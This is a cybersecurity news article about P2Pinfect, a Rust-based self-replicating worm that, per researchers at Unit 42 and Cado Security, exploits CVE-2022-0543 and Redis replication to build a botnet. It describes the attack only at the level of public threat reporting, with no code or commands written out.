1 August 2023

New P2Pinfect botnet malware targets Redis servers


New P2Pinfect botnet malware targets Redis servers

A novel strain of malware has been observed targeting susceptible Redis servers to ensnare them into a botnet.

Dubbed “P2Pinfect” by its developers, the malware is a peer-to-peer self-replicating worm that comes in versions for both Windows and Linux.

The P2Pinfect malware was initially detailed by researchers at Palo Alto Networks’ Unit 42, who discovered it exploited CVE-2022-0543, a LUA sandbox escape vulnerability present in certain versions of Redis.

The worm uses a number of known Redis exploitation methods for initial access, according to researchers with Cado Security. In the observed attack, a threat actor breached Cado’s honeypot infrastructure by exploiting the replication feature in Redis.

“A common attack pattern against Redis in cloud environments is to exploit this feature using a malicious instance to enable replication. This is achieved via connecting to an exposed Redis instance and issuing the SLAVEOF command,” the researchers wrote in a technical report.

The primary payload is an ELF file written in a combination of C and Rust using Rust’s foreign function interface (FFI) library. Upon execution, the binary updates the SSH configuration of the host “to a near default state” allowing the attacker to connect to the server via SSH and enable password authentication.

“P2Pinfect is well-designed and utilizes sophisticated techniques for replication and C2. The choice of using Rust also allows for easier portability of code across platforms (with the Windows and Linux binaries sharing a lot of the same code), while also making static analysis of the code significantly harder. This is due to the complexity of Rust itself, the inclusion of C code due to the Foreign Function Interface feature, and the lack of tooling available for analysis,” the researchers concluded.


Back to the list

Latest Posts

Cyber Security Week in Review: December 20, 2024

Cyber Security Week in Review: December 20, 2024

In brief: A suspected Russian cyberattack hits Ukraine's state registries, new ICS malware targets Mitsubishi and Siemens systems, and more.
20 December 2024
Major phishing campaign abuses HubSpot to steal credentials from European firms

Major phishing campaign abuses HubSpot to steal credentials from European firms

The attackers exploited the service’s legitimate functionality to create convincing phishing pages.
19 December 2024
UAC-0125 malware campaign targeting Ukrainian military personnel

UAC-0125 malware campaign targeting Ukrainian military personnel

Victims are lured to fraudulent websites offering to download a malicious version of the Army+ app.
19 December 2024